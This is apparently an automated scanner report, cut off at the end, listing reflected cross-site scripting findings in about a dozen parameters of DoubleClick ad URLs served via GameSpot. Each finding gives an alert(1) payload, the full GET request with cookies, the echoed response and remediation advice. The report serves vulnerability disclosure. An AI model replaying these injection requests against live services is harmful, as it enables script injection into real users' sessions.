<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... /adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243b35f8"-alert(1)-"3d6c7297d10&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2"); var fscUrl = url; var fscUrlClickT ...[SNIP]...
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b8d0"-alert(1)-"bfd4e74080 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F8b8d0"-alert(1)-"bfd4e74080&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F8b8d0"-alert(1)-"bfd4e74080&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cart ...[SNIP]...
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21f4e"-alert(1)-"8cacbd8fb3b was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=51158421f4e"-alert(1)-"8cacbd8fb3b&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... /click%3Bh%3Dv8/3af6/17/135/%2a/u%3B240444493%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=51158421f4e"-alert(1)-"8cacbd8fb3b&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAA ...[SNIP]...
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2f17"-alert(1)-"83eb41c21da was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6d2f17"-alert(1)-"83eb41c21da&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... /u%3B240444493%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6d2f17"-alert(1)-"83eb41c21da&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event= ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2df1"-alert(1)-"f56d955467a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369c2df1"-alert(1)-"f56d955467a&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... eclick.net/click%3Bh%3Dv8/3af6/17/135/%2a/u%3B240444493%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369c2df1"-alert(1)-"f56d955467a&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4A ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb486"-alert(1)-"6a17cf53e92 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34eb486"-alert(1)-"6a17cf53e92&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... &site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34eb486"-alert(1)-"6a17cf53e92&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ...[SNIP]...
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1678c"-alert(1)-"c45637662c0 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=41678c"-alert(1)-"c45637662c0&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 40444525%3B0-0%3B0%3B63339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=41678c"-alert(1)-"c45637662c0&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36. ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98a4a"-alert(1)-"98440cb0d70 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=98a4a"-alert(1)-"98440cb0d70&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=98a4a"-alert(1)-"98440cb0d70&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.c ...[SNIP]...
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70064"-alert(1)-"ef89b4dccf7 was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=70064"-alert(1)-"ef89b4dccf7&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=70064"-alert(1)-"ef89b4dccf7&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2"); var fscUrl = url ...[SNIP]...
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d88d7"-alert(1)-"3791f88907e was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=d88d7"-alert(1)-"3791f88907e&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... og.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=d88d7"-alert(1)-"3791f88907e&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2"); var fscUr ...[SNIP]...
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16d91"-alert(1)-"fe9314ae6fa was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=16d91"-alert(1)-"fe9314ae6fa&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 0%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=16d91"-alert(1)-"fe9314ae6fa&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360 ...[SNIP]...
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c79ec"-alert(1)-"b8a7c4334dd was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=c79ec"-alert(1)-"b8a7c4334dd&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=c79ec"-alert(1)-"b8a7c4334dd&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumba ...[SNIP]...
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6d9c"-alert(1)-"5626e508392 was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
